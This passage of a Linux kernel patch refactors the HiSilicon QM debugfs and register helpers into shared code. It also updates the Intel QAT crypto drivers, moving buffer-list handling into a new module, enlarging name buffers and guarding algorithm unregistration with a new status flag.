+ 	if (qm->fun_type == QM_HW_PF)
+ 		debugfs_create_file("alg_qos", 0644, qm->debug.debug_root,
+@@ -4718,88 +3693,6 @@ static void hisi_qm_set_algqos_init(struct hisi_qm *qm)
+ 				    qm, &qm_algqos_fops);
+ }
+ 
+-/**
+- * hisi_qm_debug_init() - Initialize qm related debugfs files.
+- * @qm: The qm for which we want to add debugfs files.
+- *
+- * Create qm related debugfs files.
+- */
+-void hisi_qm_debug_init(struct hisi_qm *qm)
+-{
+-	struct dfx_diff_registers *qm_regs = qm->debug.qm_diff_regs;
+-	struct qm_dfx *dfx = &qm->debug.dfx;
+-	struct dentry *qm_d;
+-	void *data;
+-	int i;
+-
+-	qm_d = debugfs_create_dir("qm", qm->debug.debug_root);
+-	qm->debug.qm_d = qm_d;
+-
+-	/* only show this in PF */
+-	if (qm->fun_type == QM_HW_PF) {
+-		qm_create_debugfs_file(qm, qm->debug.debug_root, CURRENT_QM);
+-		for (i = CURRENT_Q; i < DEBUG_FILE_NUM; i++)
+-			qm_create_debugfs_file(qm, qm->debug.qm_d, i);
+-	}
+-
+-	if (qm_regs)
+-		debugfs_create_file("diff_regs", 0444, qm->debug.qm_d,
+-					qm, &qm_diff_regs_fops);
+-
+-	debugfs_create_file("regs", 0444, qm->debug.qm_d, qm, &qm_regs_fops);
+-
+-	debugfs_create_file("cmd", 0600, qm->debug.qm_d, qm, &qm_cmd_fops);
+-
+-	debugfs_create_file("status", 0444, qm->debug.qm_d, qm,
+-			&qm_status_fops);
+-	for (i = 0; i < ARRAY_SIZE(qm_dfx_files); i++) {
+-		data = (atomic64_t *)((uintptr_t)dfx + qm_dfx_files[i].offset);
+-		debugfs_create_file(qm_dfx_files[i].name,
+-			0644,
+-			qm_d,
+-			data,
+-			&qm_atomic64_ops);
+-	}
+-
+-	if (test_bit(QM_SUPPORT_FUNC_QOS, &qm->caps))
+-		hisi_qm_set_algqos_init(qm);
+-}
+-EXPORT_SYMBOL_GPL(hisi_qm_debug_init);
+-
+-/**
+- * hisi_qm_debug_regs_clear() - clear qm debug related registers.
+- * @qm: The qm for which we want to clear its debug registers.
+- */
+-void hisi_qm_debug_regs_clear(struct hisi_qm *qm)
+-{
+-	const struct debugfs_reg32 *regs;
+-	int i;
+-
+-	/* clear current_qm */
+-	writel(0x0, qm->io_base + QM_DFX_MB_CNT_VF);
+-	writel(0x0, qm->io_base + QM_DFX_DB_CNT_VF);
+-
+-	/* clear current_q */
+-	writel(0x0, qm->io_base + QM_DFX_SQE_CNT_VF_SQN);
+-	writel(0x0, qm->io_base + QM_DFX_CQE_CNT_VF_CQN);
+-
+-	/*
+-	 * these registers are reading and clearing, so clear them after
+-	 * reading them.
+-	 */
+-	writel(0x1, qm->io_base + QM_DFX_CNT_CLR_CE);
+-
+-	regs = qm_dfx_regs;
+-	for (i = 0; i < CNT_CYC_REGS_NUM; i++) {
+-		readl(qm->io_base + regs->offset);
+-		regs++;
+-	}
+-
+-	/* clear clear_enable */
+-	writel(0x0, qm->io_base + QM_DFX_CNT_CLR_CE);
+-}
+-EXPORT_SYMBOL_GPL(hisi_qm_debug_regs_clear);
+-
+ static void hisi_qm_init_vf_qos(struct hisi_qm *qm, int total_func)
+ {
+ 	int i;
+@@ -5438,24 +4331,6 @@ static int qm_controller_reset_done(struct hisi_qm *qm)
+ 	return 0;
+ }
+ 
+-static void qm_show_last_dfx_regs(struct hisi_qm *qm)
+-{
+-	struct qm_debug *debug = &qm->debug;
+-	struct pci_dev *pdev = qm->pdev;
+-	u32 val;
+-	int i;
+-
+-	if (qm->fun_type == QM_HW_VF || !debug->qm_last_words)
+-		return;
+-
+-	for (i = 0; i < ARRAY_SIZE(qm_dfx_regs); i++) {
+-		val = readl_relaxed(qm->io_base + qm_dfx_regs[i].offset);
+-		if (debug->qm_last_words[i] != val)
+-			pci_info(pdev, "%s \t= 0x%08x => 0x%08x\n",
+-			qm_dfx_regs[i].name, debug->qm_last_words[i], val);
+-	}
+-}
+-
+ static int qm_controller_reset(struct hisi_qm *qm)
+ {
+ 	struct pci_dev *pdev = qm->pdev;
+@@ -5471,7 +4346,7 @@ static int qm_controller_reset(struct hisi_qm *qm)
+ 		return ret;
+ 	}
+ 
+-	qm_show_last_dfx_regs(qm);
++	hisi_qm_show_last_dfx_regs(qm);
+ 	if (qm->err_ini->show_last_dfx_regs)
+ 		qm->err_ini->show_last_dfx_regs(qm);
+ 
+@@ -6091,6 +4966,7 @@ free_eq_irq:
+ 
+ static int qm_get_qp_num(struct hisi_qm *qm)
+ {
++	struct device *dev = &qm->pdev->dev;
+ 	bool is_db_isolation;
+ 
+ 	/* VF's qp_num assigned by PF in v2, and VF can get qp_num by vft. */
+@@ -6107,13 +4983,21 @@ static int qm_get_qp_num(struct hisi_qm *qm)
+ 	qm->max_qp_num = hisi_qm_get_hw_info(qm, qm_basic_info,
+ 					     QM_FUNC_MAX_QP_CAP, is_db_isolation);
+ 
+-	/* check if qp number is valid */
+-	if (qm->qp_num > qm->max_qp_num) {
+-		dev_err(&qm->pdev->dev, "qp num(%u) is more than max qp num(%u)!\n",
++	if (qm->qp_num <= qm->max_qp_num)
++		return 0;
++
++	if (test_bit(QM_MODULE_PARAM, &qm->misc_ctl)) {
++		/* Check whether the set qp number is valid */
++		dev_err(dev, "qp num(%u) is more than max qp num(%u)!\n",
+ 			qm->qp_num, qm->max_qp_num);
+ 		return -EINVAL;
+ 	}
+ 
++	dev_info(dev, "Default qp num(%u) is too big, reset it to Function's max qp num(%u)!\n",
++		 qm->qp_num, qm->max_qp_num);
++	qm->qp_num = qm->max_qp_num;
++	qm->debug.curr_qm_qp_num = qm->qp_num;
++
+ 	return 0;
+ }
+ 
+@@ -6358,26 +5242,6 @@ err_destroy_idr:
+ 	return ret;
+ }
+ 
+-static void qm_last_regs_init(struct hisi_qm *qm)
+-{
+-	int dfx_regs_num = ARRAY_SIZE(qm_dfx_regs);
+-	struct qm_debug *debug = &qm->debug;
+-	int i;
+-
+-	if (qm->fun_type == QM_HW_VF)
+-		return;
+-
+-	debug->qm_last_words = kcalloc(dfx_regs_num, sizeof(unsigned int),
+-								GFP_KERNEL);
+-	if (!debug->qm_last_words)
+-		return;
+-
+-	for (i = 0; i < dfx_regs_num; i++) {
+-		debug->qm_last_words[i] = readl_relaxed(qm->io_base +
+-			qm_dfx_regs[i].offset);
+-	}
+-}
+-
+ /**
+  * hisi_qm_init() - Initialize configures about qm.
+  * @qm: The qm needing init.
+@@ -6426,8 +5290,6 @@ int hisi_qm_init(struct hisi_qm *qm)
+ 	qm_cmd_init(qm);
+ 	atomic_set(&qm->status.flags, QM_INIT);
+ 
+-	qm_last_regs_init(qm);
+-
+ 	return 0;
+ 
+ err_free_qm_memory:
+diff --git a/drivers/crypto/hisilicon/qm_common.h b/drivers/crypto/hisilicon/qm_common.h
+new file mode 100644
+index 0000000000000..8e36aa9c681be
+--- /dev/null
++++ b/drivers/crypto/hisilicon/qm_common.h
+@@ -0,0 +1,86 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++/* Copyright (c) 2022 HiSilicon Limited. */
++#ifndef QM_COMMON_H
++#define QM_COMMON_H
++
++#define QM_DBG_READ_LEN		256
++
++struct qm_cqe {
++	__le32 rsvd0;
++	__le16 cmd_id;
++	__le16 rsvd1;
++	__le16 sq_head;
++	__le16 sq_num;
++	__le16 rsvd2;
++	__le16 w7;
++};
++
++struct qm_eqe {
++	__le32 dw0;
++};
++
++struct qm_aeqe {
++	__le32 dw0;
++};
++
++struct qm_sqc {
++	__le16 head;
++	__le16 tail;
++	__le32 base_l;
++	__le32 base_h;
++	__le32 dw3;
++	__le16 w8;
++	__le16 rsvd0;
++	__le16 pasid;
++	__le16 w11;
++	__le16 cq_num;
++	__le16 w13;
++	__le32 rsvd1;
++};
++
++struct qm_cqc {
++	__le16 head;
++	__le16 tail;
++	__le32 base_l;
++	__le32 base_h;
++	__le32 dw3;
++	__le16 w8;
++	__le16 rsvd0;
++	__le16 pasid;
++	__le16 w11;
++	__le32 dw6;
++	__le32 rsvd1;
++};
++
++struct qm_eqc {
++	__le16 head;
++	__le16 tail;
++	__le32 base_l;
++	__le32 base_h;
++	__le32 dw3;
++	__le32 rsvd[2];
++	__le32 dw6;
++};
++
++struct qm_aeqc {
++	__le16 head;
++	__le16 tail;
++	__le32 base_l;
++	__le32 base_h;
++	__le32 dw3;
++	__le32 rsvd[2];
++	__le32 dw6;
++};
++
++static const char * const qm_s[] = {
++	"init", "start", "close", "stop",
++};
++
++void *hisi_qm_ctx_alloc(struct hisi_qm *qm, size_t ctx_size,
++			dma_addr_t *dma_addr);
++void hisi_qm_ctx_free(struct hisi_qm *qm, size_t ctx_size,
++		      const void *ctx_addr, dma_addr_t *dma_addr);
++void hisi_qm_show_last_dfx_regs(struct hisi_qm *qm);
++void hisi_qm_set_algqos_init(struct hisi_qm *qm);
++
++#endif
+diff --git a/drivers/crypto/hisilicon/sec2/sec_main.c b/drivers/crypto/hisilicon/sec2/sec_main.c
+index 3705412bac5f1..e384988bda917 100644
+--- a/drivers/crypto/hisilicon/sec2/sec_main.c
++++ b/drivers/crypto/hisilicon/sec2/sec_main.c
+@@ -312,8 +312,11 @@ static int sec_diff_regs_show(struct seq_file *s, void *unused)
+ }
+ DEFINE_SHOW_ATTRIBUTE(sec_diff_regs);
+ 
++static bool pf_q_num_flag;
+ static int sec_pf_q_num_set(const char *val, const struct kernel_param *kp)
+ {
++	pf_q_num_flag = true;
++
+ 	return q_num_set(val, kp, PCI_DEVICE_ID_HUAWEI_SEC_PF);
+ }
+ 
+@@ -899,8 +902,7 @@ static int sec_debugfs_init(struct hisi_qm *qm)
+ 	qm->debug.sqe_mask_offset = SEC_SQE_MASK_OFFSET;
+ 	qm->debug.sqe_mask_len = SEC_SQE_MASK_LEN;
+ 
+-	ret = hisi_qm_diff_regs_init(qm, sec_diff_regs,
+-				ARRAY_SIZE(sec_diff_regs));
++	ret = hisi_qm_regs_debugfs_init(qm, sec_diff_regs, ARRAY_SIZE(sec_diff_regs));
+ 	if (ret) {
+ 		dev_warn(dev, "Failed to init SEC diff regs!\n");
+ 		goto debugfs_remove;
+@@ -915,7 +917,7 @@ static int sec_debugfs_init(struct hisi_qm *qm)
+ 	return 0;
+ 
+ failed_to_create:
+-	hisi_qm_diff_regs_uninit(qm, ARRAY_SIZE(sec_diff_regs));
++	hisi_qm_regs_debugfs_uninit(qm, ARRAY_SIZE(sec_diff_regs));
+ debugfs_remove:
+ 	debugfs_remove_recursive(sec_debugfs_root);
+ 	return ret;
+@@ -923,7 +925,7 @@ debugfs_remove:
+ 
+ static void sec_debugfs_exit(struct hisi_qm *qm)
+ {
+-	hisi_qm_diff_regs_uninit(qm, ARRAY_SIZE(sec_diff_regs));
++	hisi_qm_regs_debugfs_uninit(qm, ARRAY_SIZE(sec_diff_regs));
+ 
+ 	debugfs_remove_recursive(qm->debug.debug_root);
+ }
+@@ -1123,6 +1125,8 @@ static int sec_qm_init(struct hisi_qm *qm, struct pci_dev *pdev)
+ 		qm->qp_num = pf_q_num;
+ 		qm->debug.curr_qm_qp_num = pf_q_num;
+ 		qm->qm_list = &sec_devices;
++		if (pf_q_num_flag)
++			set_bit(QM_MODULE_PARAM, &qm->misc_ctl);
+ 	} else if (qm->fun_type == QM_HW_VF && qm->ver == QM_HW_V1) {
+ 		/*
+ 		 * have no way to get qm configure in VM in v1 hardware,
+diff --git a/drivers/crypto/hisilicon/zip/zip_main.c b/drivers/crypto/hisilicon/zip/zip_main.c
+index c863435e8c75a..190b4fecfc747 100644
+--- a/drivers/crypto/hisilicon/zip/zip_main.c
++++ b/drivers/crypto/hisilicon/zip/zip_main.c
+@@ -365,8 +365,11 @@ static u32 uacce_mode = UACCE_MODE_NOUACCE;
+ module_param_cb(uacce_mode, &zip_uacce_mode_ops, &uacce_mode, 0444);
+ MODULE_PARM_DESC(uacce_mode, UACCE_MODE_DESC);
+ 
++static bool pf_q_num_flag;
+ static int pf_q_num_set(const char *val, const struct kernel_param *kp)
+ {
++	pf_q_num_flag = true;
++
+ 	return q_num_set(val, kp, PCI_DEVICE_ID_HUAWEI_ZIP_PF);
+ }
+ 
+@@ -849,8 +852,7 @@ static int hisi_zip_debugfs_init(struct hisi_qm *qm)
+ 	qm->debug.sqe_mask_offset = HZIP_SQE_MASK_OFFSET;
+ 	qm->debug.sqe_mask_len = HZIP_SQE_MASK_LEN;
+ 	qm->debug.debug_root = dev_d;
+-	ret = hisi_qm_diff_regs_init(qm, hzip_diff_regs,
+-				ARRAY_SIZE(hzip_diff_regs));
++	ret = hisi_qm_regs_debugfs_init(qm, hzip_diff_regs, ARRAY_SIZE(hzip_diff_regs));
+ 	if (ret) {
+ 		dev_warn(dev, "Failed to init ZIP diff regs!\n");
+ 		goto debugfs_remove;
+@@ -869,7 +871,7 @@ static int hisi_zip_debugfs_init(struct hisi_qm *qm)
+ 	return 0;
+ 
+ failed_to_create:
+-	hisi_qm_diff_regs_uninit(qm, ARRAY_SIZE(hzip_diff_regs));
++	hisi_qm_regs_debugfs_uninit(qm, ARRAY_SIZE(hzip_diff_regs));
+ debugfs_remove:
+ 	debugfs_remove_recursive(hzip_debugfs_root);
+ 	return ret;
+@@ -895,7 +897,7 @@ static void hisi_zip_debug_regs_clear(struct hisi_qm *qm)
+ 
+ static void hisi_zip_debugfs_exit(struct hisi_qm *qm)
+ {
+-	hisi_qm_diff_regs_uninit(qm, ARRAY_SIZE(hzip_diff_regs));
++	hisi_qm_regs_debugfs_uninit(qm, ARRAY_SIZE(hzip_diff_regs));
+ 
+ 	debugfs_remove_recursive(qm->debug.debug_root);
+ 
+@@ -1141,6 +1143,8 @@ static int hisi_zip_qm_init(struct hisi_qm *qm, struct pci_dev *pdev)
+ 		qm->qp_num = pf_q_num;
+ 		qm->debug.curr_qm_qp_num = pf_q_num;
+ 		qm->qm_list = &zip_devices;
++		if (pf_q_num_flag)
++			set_bit(QM_MODULE_PARAM, &qm->misc_ctl);
+ 	} else if (qm->fun_type == QM_HW_VF && qm->ver == QM_HW_V1) {
+ 		/*
+ 		 * have no way to get qm configure in VM in v1 hardware,
+diff --git a/drivers/crypto/qat/qat_common/Makefile b/drivers/crypto/qat/qat_common/Makefile
+index 80919cfcc29da..b0587d03eac29 100644
+--- a/drivers/crypto/qat/qat_common/Makefile
++++ b/drivers/crypto/qat/qat_common/Makefile
+@@ -19,7 +19,8 @@ intel_qat-objs := adf_cfg.o \
+ 	qat_asym_algs.o \
+ 	qat_algs_send.o \
+ 	qat_uclo.o \
+-	qat_hal.o
++	qat_hal.o \
++	qat_bl.o
+ 
+ intel_qat-$(CONFIG_DEBUG_FS) += adf_transport_debug.o
+ intel_qat-$(CONFIG_PCI_IOV) += adf_sriov.o adf_vf_isr.o adf_pfvf_utils.o \
+diff --git a/drivers/crypto/qat/qat_common/adf_accel_devices.h b/drivers/crypto/qat/qat_common/adf_accel_devices.h
+index 20f50d0e65f89..ad01d99e6e2ba 100644
+--- a/drivers/crypto/qat/qat_common/adf_accel_devices.h
++++ b/drivers/crypto/qat/qat_common/adf_accel_devices.h
+@@ -27,7 +27,7 @@
+ #define ADF_PCI_MAX_BARS 3
+ #define ADF_DEVICE_NAME_LENGTH 32
+ #define ADF_ETR_MAX_RINGS_PER_BANK 16
+-#define ADF_MAX_MSIX_VECTOR_NAME 16
++#define ADF_MAX_MSIX_VECTOR_NAME 48
+ #define ADF_DEVICE_NAME_PREFIX "qat_"
+ 
+ enum adf_accel_capabilities {
+diff --git a/drivers/crypto/qat/qat_common/adf_common_drv.h b/drivers/crypto/qat/qat_common/adf_common_drv.h
+index bff613eec5c4b..d2bc2361cd069 100644
+--- a/drivers/crypto/qat/qat_common/adf_common_drv.h
++++ b/drivers/crypto/qat/qat_common/adf_common_drv.h
+@@ -25,6 +25,7 @@
+ #define ADF_STATUS_AE_STARTED 6
+ #define ADF_STATUS_PF_RUNNING 7
+ #define ADF_STATUS_IRQ_ALLOCATED 8
++#define ADF_STATUS_CRYPTO_ALGS_REGISTERED 9
+ 
+ enum adf_dev_reset_mode {
+ 	ADF_DEV_RESET_ASYNC = 0,
+diff --git a/drivers/crypto/qat/qat_common/adf_init.c b/drivers/crypto/qat/qat_common/adf_init.c
+index d6f3314246179..2e3481270c4ba 100644
+--- a/drivers/crypto/qat/qat_common/adf_init.c
++++ b/drivers/crypto/qat/qat_common/adf_init.c
+@@ -209,6 +209,8 @@ int adf_dev_start(struct adf_accel_dev *accel_dev)
+ 		clear_bit(ADF_STATUS_STARTED, &accel_dev->status);
+ 		return -EFAULT;
+ 	}
++	set_bit(ADF_STATUS_CRYPTO_ALGS_REGISTERED, &accel_dev->status);
++
+ 	return 0;
+ }
+ EXPORT_SYMBOL_GPL(adf_dev_start);
+@@ -237,10 +239,12 @@ void adf_dev_stop(struct adf_accel_dev *accel_dev)
+ 	clear_bit(ADF_STATUS_STARTING, &accel_dev->status);
+ 	clear_bit(ADF_STATUS_STARTED, &accel_dev->status);
+ 
+-	if (!list_empty(&accel_dev->crypto_list)) {
++	if (!list_empty(&accel_dev->crypto_list) &&
++	    test_bit(ADF_STATUS_CRYPTO_ALGS_REGISTERED, &accel_dev->status)) {
+ 		qat_algs_unregister();
+ 		qat_asym_algs_unregister();
+ 	}
++	clear_bit(ADF_STATUS_CRYPTO_ALGS_REGISTERED, &accel_dev->status);
+ 
+ 	list_for_each(list_itr, &service_table) {
+ 		service = list_entry(list_itr, struct service_hndl, list);
+diff --git a/drivers/crypto/qat/qat_common/adf_sysfs.c b/drivers/crypto/qat/qat_common/adf_sysfs.c
+index 3eb6611ab1b11..81b2ecfcc8060 100644
+--- a/drivers/crypto/qat/qat_common/adf_sysfs.c
++++ b/drivers/crypto/qat/qat_common/adf_sysfs.c
+@@ -61,7 +61,9 @@ static ssize_t state_store(struct device *dev, struct device_attribute *attr,
+ 		dev_info(dev, "Starting device qat_dev%d\n", accel_id);
+ 
+ 		ret = adf_dev_up(accel_dev, true);
+-		if (ret < 0) {
++		if (ret == -EALREADY) {
++			break;
++		} else if (ret) {
+ 			dev_err(dev, "Failed to start device qat_dev%d\n",
+ 				accel_id);
+ 			adf_dev_down(accel_dev, true);
+diff --git a/drivers/crypto/qat/qat_common/adf_transport_debug.c b/drivers/crypto/qat/qat_common/adf_transport_debug.c
+index 08bca1c506c0e..e2dd568b87b51 100644
+--- a/drivers/crypto/qat/qat_common/adf_transport_debug.c
++++ b/drivers/crypto/qat/qat_common/adf_transport_debug.c
+@@ -90,7 +90,7 @@ DEFINE_SEQ_ATTRIBUTE(adf_ring_debug);
+ int adf_ring_debugfs_add(struct adf_etr_ring_data *ring, const char *name)
+ {
+ 	struct adf_etr_ring_debug_entry *ring_debug;
+-	char entry_name[8];
++	char entry_name[16];
+ 
+ 	ring_debug = kzalloc(sizeof(*ring_debug), GFP_KERNEL);
+ 	if (!ring_debug)
+@@ -192,7 +192,7 @@ int adf_bank_debugfs_add(struct adf_etr_bank_data *bank)
+ {
+ 	struct adf_accel_dev *accel_dev = bank->accel_dev;
+ 	struct dentry *parent = accel_dev->transport->debug;
+-	char name[8];
++	char name[16];
+ 
+ 	snprintf(name, sizeof(name), "bank_%02d", bank->bank_number);
+ 	bank->bank_debug_dir = debugfs_create_dir(name, parent);
+diff --git a/drivers/crypto/qat/qat_common/qat_algs.c b/drivers/crypto/qat/qat_common/qat_algs.c
+index f56ee4cc5ae8b..b61ada5591586 100644
+--- a/drivers/crypto/qat/qat_common/qat_algs.c
++++ b/drivers/crypto/qat/qat_common/qat_algs.c
+@@ -23,6 +23,7 @@
+ #include "icp_qat_hw.h"
+ #include "icp_qat_fw.h"
+ #include "icp_qat_fw_la.h"
++#include "qat_bl.h"
+ 
+ #define QAT_AES_HW_CONFIG_ENC(alg, mode) \
+ 	ICP_QAT_HW_CIPHER_CONFIG_BUILD(mode, alg, \
+@@ -663,189 +664,6 @@ static int qat_alg_aead_setkey(struct crypto_aead *tfm, const u8 *key,
+ 		return qat_alg_aead_newkey(tfm, key, keylen);
+ }
+ 
+-static void qat_alg_free_bufl(struct qat_crypto_instance *inst,
+-			      struct qat_crypto_request *qat_req)
+-{
+-	struct device *dev = &GET_DEV(inst->accel_dev);
+-	struct qat_alg_buf_list *bl = qat_req->buf.bl;
+-	struct qat_alg_buf_list *blout = qat_req->buf.blout;
+-	dma_addr_t blp = qat_req->buf.blp;
+-	dma_addr_t blpout = qat_req->buf.bloutp;
+-	size_t sz = qat_req->buf.sz;
+-	size_t sz_out = qat_req->buf.sz_out;
+-	int bl_dma_dir;
+-	int i;
+-
+-	bl_dma_dir = blp != blpout ? DMA_TO_DEVICE : DMA_BIDIRECTIONAL;
+-
+-	for (i = 0; i < bl->num_bufs; i++)
+-		dma_unmap_single(dev, bl->bufers[i].addr,
+-				 bl->bufers[i].len, bl_dma_dir);
+-
+-	dma_unmap_single(dev, blp, sz, DMA_TO_DEVICE);
+-
+-	if (!qat_req->buf.sgl_src_valid)
+-		kfree(bl);
+-
+-	if (blp != blpout) {
+-		/* If out of place operation dma unmap only data */
+-		int bufless = blout->num_bufs - blout->num_mapped_bufs;
+-
+-		for (i = bufless; i < blout->num_bufs; i++) {
+-			dma_unmap_single(dev, blout->bufers[i].addr,
+-					 blout->bufers[i].len,
+-					 DMA_FROM_DEVICE);
+-		}
+-		dma_unmap_single(dev, blpout, sz_out, DMA_TO_DEVICE);
+-
+-		if (!qat_req->buf.sgl_dst_valid)
+-			kfree(blout);
+-	}
+-}
+-
+-static int qat_alg_sgl_to_bufl(struct qat_crypto_instance *inst,
+-			       struct scatterlist *sgl,
+-			       struct scatterlist *sglout,
+-			       struct qat_crypto_request *qat_req,
+-			       gfp_t flags)
+-{
+-	struct device *dev = &GET_DEV(inst->accel_dev);
+-	int i, sg_nctr = 0;
+-	int n = sg_nents(sgl);
+-	struct qat_alg_buf_list *bufl;
+-	struct qat_alg_buf_list *buflout = NULL;
+-	dma_addr_t blp = DMA_MAPPING_ERROR;
+-	dma_addr_t bloutp = DMA_MAPPING_ERROR;
+-	struct scatterlist *sg;
+-	size_t sz_out, sz = struct_size(bufl, bufers, n);
+-	int node = dev_to_node(&GET_DEV(inst->accel_dev));
+-	int bufl_dma_dir;
+-
+-	if (unlikely(!n))
+-		return -EINVAL;
+-
+-	qat_req->buf.sgl_src_valid = false;
+-	qat_req->buf.sgl_dst_valid = false;
+-
+-	if (n > QAT_MAX_BUFF_DESC) {
+-		bufl = kzalloc_node(sz, flags, node);
+-		if (unlikely(!bufl))
+-			return -ENOMEM;
+-	} else {
+-		bufl = &qat_req->buf.sgl_src.sgl_hdr;
+-		memset(bufl, 0, sizeof(struct qat_alg_buf_list));
+-		qat_req->buf.sgl_src_valid = true;
+-	}
+-
+-	bufl_dma_dir = sgl != sglout ? DMA_TO_DEVICE : DMA_BIDIRECTIONAL;
+-
+-	for_each_sg(sgl, sg, n, i)
+-		bufl->bufers[i].addr = DMA_MAPPING_ERROR;
+-
+-	for_each_sg(sgl, sg, n, i) {
+-		int y = sg_nctr;
+-
+-		if (!sg->length)
+-			continue;
+-
+-		bufl->bufers[y].addr = dma_map_single(dev, sg_virt(sg),
+-						      sg->length,
+-						      bufl_dma_dir);
+-		bufl->bufers[y].len = sg->length;
+-		if (unlikely(dma_mapping_error(dev, bufl->bufers[y].addr)))
+-			goto err_in;
+-		sg_nctr++;
+-	}
+-	bufl->num_bufs = sg_nctr;
+-	blp = dma_map_single(dev, bufl, sz, DMA_TO_DEVICE);
+-	if (unlikely(dma_mapping_error(dev, blp)))
+-		goto err_in;
+-	qat_req->buf.bl = bufl;
+-	qat_req->buf.blp = blp;
+-	qat_req->buf.sz = sz;
+-	/* Handle out of place operation */
+-	if (sgl != sglout) {
+-		struct qat_alg_buf *bufers;
+-
+-		n = sg_nents(sglout);
+-		sz_out = struct_size(buflout, bufers, n);
+-		sg_nctr = 0;
+-
+-		if (n > QAT_MAX_BUFF_DESC) {
+-			buflout = kzalloc_node(sz_out, flags, node);
+-			if (unlikely(!buflout))
+-				goto err_in;
+-		} else {
+-			buflout = &qat_req->buf.sgl_dst.sgl_hdr;
+-			memset(buflout, 0, sizeof(struct qat_alg_buf_list));
+-			qat_req->buf.sgl_dst_valid = true;
+-		}
+-
+-		bufers = buflout->bufers;
+-		for_each_sg(sglout, sg, n, i)
+-			bufers[i].addr = DMA_MAPPING_ERROR;
+-
+-		for_each_sg(sglout, sg, n, i) {
+-			int y = sg_nctr;
+-
+-			if (!sg->length)
+-				continue;
+-
+-			bufers[y].addr = dma_map_single(dev, sg_virt(sg),
+-							sg->length,
+-							DMA_FROM_DEVICE);
+-			if (unlikely(dma_mapping_error(dev, bufers[y].addr)))
+-				goto err_out;
+-			bufers[y].len = sg->length;
+-			sg_nctr++;
+-		}
+-		buflout->num_bufs = sg_nctr;
+-		buflout->num_mapped_bufs = sg_nctr;
+-		bloutp = dma_map_single(dev, buflout, sz_out, DMA_TO_DEVICE);
+-		if (unlikely(dma_mapping_error(dev, bloutp)))
+-			goto err_out;
+-		qat_req->buf.blout = buflout;
+-		qat_req->buf.bloutp = bloutp;
+-		qat_req->buf.sz_out = sz_out;
+-	} else {
+-		/* Otherwise set the src and dst to the same address */
+-		qat_req->buf.bloutp = qat_req->buf.blp;
+-		qat_req->buf.sz_out = 0;
+-	}
+-	return 0;
+-
+-err_out:
+-	if (!dma_mapping_error(dev, bloutp))
+-		dma_unmap_single(dev, bloutp, sz_out, DMA_TO_DEVICE);
+-
+-	n = sg_nents(sglout);
+-	for (i = 0; i < n; i++)
+-		if (!dma_mapping_error(dev, buflout->bufers[i].addr))
+-			dma_unmap_single(dev, buflout->bufers[i].addr,
+-					 buflout->bufers[i].len,
+-					 DMA_FROM_DEVICE);
+-
+-	if (!qat_req->buf.sgl_dst_valid)
+-		kfree(buflout);
+-
+-err_in:
+-	if (!dma_mapping_error(dev, blp))
+-		dma_unmap_single(dev, blp, sz, DMA_TO_DEVICE);
+-
+-	n = sg_nents(sgl);
+-	for (i = 0; i < n; i++)
+-		if (!dma_mapping_error(dev, bufl->bufers[i].addr))
+-			dma_unmap_single(dev, bufl->bufers[i].addr,
+-					 bufl->bufers[i].len,
+-					 bufl_dma_dir);
+-
+-	if (!qat_req->buf.sgl_src_valid)
+-		kfree(bufl);
+-
+-	dev_err(dev, "Failed to map buf for dma\n");
+-	return -ENOMEM;
+-}
+-
+ static void qat_aead_alg_callback(struct icp_qat_fw_la_resp *qat_resp,
+ 				  struct qat_crypto_request *qat_req)
+ {
+@@ -855,7 +673,7 @@ static void qat_aead_alg_callback(struct icp_qat_fw_la_resp *qat_resp,
+ 	u8 stat_filed = qat_resp->comn_resp.comn_status;
+ 	int res = 0, qat_res = ICP_QAT_FW_COMN_RESP_CRYPTO_STAT_GET(stat_filed);
+ 
+-	qat_alg_free_bufl(inst, qat_req);
++	qat_bl_free_bufl(inst->accel_dev, &qat_req->buf);
+ 	if (unlikely(qat_res != ICP_QAT_FW_COMN_STATUS_FLAG_OK))
+ 		res = -EBADMSG;
+ 	areq->base.complete(&areq->base, res);
+@@ -925,7 +743,7 @@ static void qat_skcipher_alg_callback(struct icp_qat_fw_la_resp *qat_resp,
+ 	u8 stat_filed = qat_resp->comn_resp.comn_status;
+ 	int res = 0, qat_res = ICP_QAT_FW_COMN_RESP_CRYPTO_STAT_GET(stat_filed);
+ 
+-	qat_alg_free_bufl(inst, qat_req);
++	qat_bl_free_bufl(inst->accel_dev, &qat_req->buf);
+ 	if (unlikely(qat_res != ICP_QAT_FW_COMN_STATUS_FLAG_OK))
+ 		res = -EINVAL;
+ 
+@@ -981,7 +799,8 @@ static int qat_alg_aead_dec(struct aead_request *areq)
+ 	if (cipher_len % AES_BLOCK_SIZE != 0)
+ 		return -EINVAL;
+ 
+-	ret = qat_alg_sgl_to_bufl(ctx->inst, areq->src, areq->dst, qat_req, f);
++	ret = qat_bl_sgl_to_bufl(ctx->inst->accel_dev, areq->src, areq->dst,
++				 &qat_req->buf, NULL, f);
+ 	if (unlikely(ret))
+ 		return ret;
+ 
+@@ -1003,7 +822,7 @@ static int qat_alg_aead_dec(struct aead_request *areq)
+ 
+ 	ret = qat_alg_send_sym_message(qat_req, ctx->inst, &areq->base);
+ 	if (ret == -ENOSPC)
+-		qat_alg_free_bufl(ctx->inst, qat_req);
++		qat_bl_free_bufl(ctx->inst->accel_dev, &qat_req->buf);
+ 
+ 	return ret;
+ }
+@@ -1024,7 +843,8 @@ static int qat_alg_aead_enc(struct aead_request *areq)
+ 	if (areq->cryptlen % AES_BLOCK_SIZE != 0)
+ 		return -EINVAL;
+ 
+-	ret = qat_alg_sgl_to_bufl(ctx->inst, areq->src, areq->dst, qat_req, f);
++	ret = qat_bl_sgl_to_bufl(ctx->inst->accel_dev, areq->src, areq->dst,
++				 &qat_req->buf, NULL, f);
+ 	if (unlikely(ret))
+ 		return ret;
+ 
+@@ -1048,7 +868,7 @@ static int qat_alg_aead_enc(struct aead_request *areq)
+ 
+ 	ret = qat_alg_send_sym_message(qat_req, ctx->inst, &areq->base);
+ 	if (ret == -ENOSPC)
+-		qat_alg_free_bufl(ctx->inst, qat_req);
++		qat_bl_free_bufl(ctx->inst->accel_dev, &qat_req->buf);
+ 
+ 	return ret;
+ }
+@@ -1209,7 +1029,8 @@ static int qat_alg_skcipher_encrypt(struct skcipher_request *req)
+ 	if (req->cryptlen == 0)
+ 		return 0;
+ 
+-	ret = qat_alg_sgl_to_bufl(ctx->inst, req->src, req->dst, qat_req, f);
++	ret = qat_bl_sgl_to_bufl(ctx->inst->accel_dev, req->src, req->dst,
++				 &qat_req->buf, NULL, f);
+ 	if (unlikely(ret))
+ 		return ret;
+ 
